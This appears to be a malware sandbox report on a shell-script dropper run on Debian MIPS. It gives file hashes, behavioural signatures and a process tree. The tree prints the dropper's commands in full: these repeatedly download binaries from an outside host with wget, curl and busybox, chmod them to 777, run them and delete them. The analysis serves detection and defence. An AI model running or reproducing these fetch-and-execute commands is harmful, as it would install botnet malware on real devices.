Analysis
-
max time kernel
77s -
max time network
75s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/10/2024, 01:58
Static task
static1
Behavioral task
behavioral1
Sample
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh
-
Size
10KB
-
MD5
bbba4f3429254ccf3146e90fd7eca8df
-
SHA1
5612421d8eddf3b60c95612c6859a6cdea063425
-
SHA256
fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f
-
SHA512
ca81a0d5a2107b1eaf232a9fbf60127c3dc672aef021a3102ff2dd11228b4b249ca357a421912ae90496b2829f5953e6f70e49b1775295c01ad555fc9c896853
-
SSDEEP
96:YmWkL7n777oVdRLuefddkNGN2NkaLn0j/6UueqRJTLWGpEIDTv//pNNsX92Lglg/:zn73oVdR8eOkOlp/TsG/MS73oVdEeOke
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description: File opened for reading; ioc: /proc/sys/crypto/fips_enabled; Process: curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh/tmp/fe8c2391ca708c9c34ea9a199274aad5b0c4643e759a738d5c66efd8689dae9f.sh1⤵PID:709
-
/bin/rm/bin/rm bins.sh2⤵PID:717
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- System Network Configuration Discovery
PID:719
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- System Network Configuration Discovery
PID:740
-
-
/bin/chmodchmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵PID:745
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵PID:748
-
-
/bin/chmodchmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵PID:751
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵PID:752
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵PID:798
-
-
/bin/chmodchmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵PID:803
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- System Network Configuration Discovery
PID:804
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- System Network Configuration Discovery
PID:807
-
-
/bin/chmodchmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵PID:810
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- System Network Configuration Discovery
PID:811
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- System Network Configuration Discovery
PID:824
-
-
/bin/chmodchmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵PID:835
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- System Network Configuration Discovery
PID:837
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- System Network Configuration Discovery
PID:851
-
-
/bin/chmodchmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵PID:854
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- System Network Configuration Discovery
PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- System Network Configuration Discovery
PID:861
-
-
/bin/chmodchmod 777 fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL./fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵PID:864
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- System Network Configuration Discovery
PID:865
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- System Network Configuration Discovery
PID:868
-
-
/bin/chmodchmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- System Network Configuration Discovery
PID:875
-
-
/bin/chmodchmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵PID:885
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵PID:892
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- System Network Configuration Discovery
PID:893
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- System Network Configuration Discovery
PID:896
-
-
/bin/chmodchmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz./cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm cE97tKtPNMY2IgdYQQhIdBeL3EyAZX6Dmz2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- System Network Configuration Discovery
PID:924
-
-
/bin/chmodchmod 777 s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp8./s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm s1FtvrbkmWhz33gifq25siJV2rOFvu3Fp82⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵PID:931
-
-
/bin/chmodchmod 777 lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q./lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm lJyUFj0hJETFJoD3nZ9qRJd2llGyTbdc6Q2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- System Network Configuration Discovery
PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh./WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm WqZNMc4uCyBYPs1iVB7EBnjvdjrv6f8NTh2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ./Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm Cr9a7Zo8yTXqAbxsp2Z57fQ5FMEWeztUxJ2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A3./lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm lIceDju7TuJlsvd7Sv4U9TdkvgoExMx6A32⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza./oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm oQsIyxtou52BAh4Gwb5QZjPJzEciEIGEza2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg./Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm Tq7O7VrhpO7z7hOsDKPtOVeQd4Rn6JmHbg2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵PID:973
-
-
/bin/chmodchmod 777 aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX2./aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm aE5e5VkVMSDqkoxccAZVEOqW3HVBWbZFX22⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q5./eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm eZBAQ5j4HUi6UapxrJ9fxckb2hxxfVf6Q52⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb./WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm WGVQXVsQ8chs4pJhpxyflODnNkoBFHVPCb2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵PID:994
-
-
/bin/chmodchmod 777 f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/f339GUxoBAypA6hNo5gVbaOVuV2gpVerv8./f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm f339GUxoBAypA6hNo5gVbaOVuV2gpVerv82⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q./izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm izZHjUXdp5GkUcvI5uvgxqmW9odILY7B2q2⤵PID:1004
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fNUR0Y5wVALPuqfvHAsQLo8vZBLNdoz5GL2⤵PID:1005
-
-
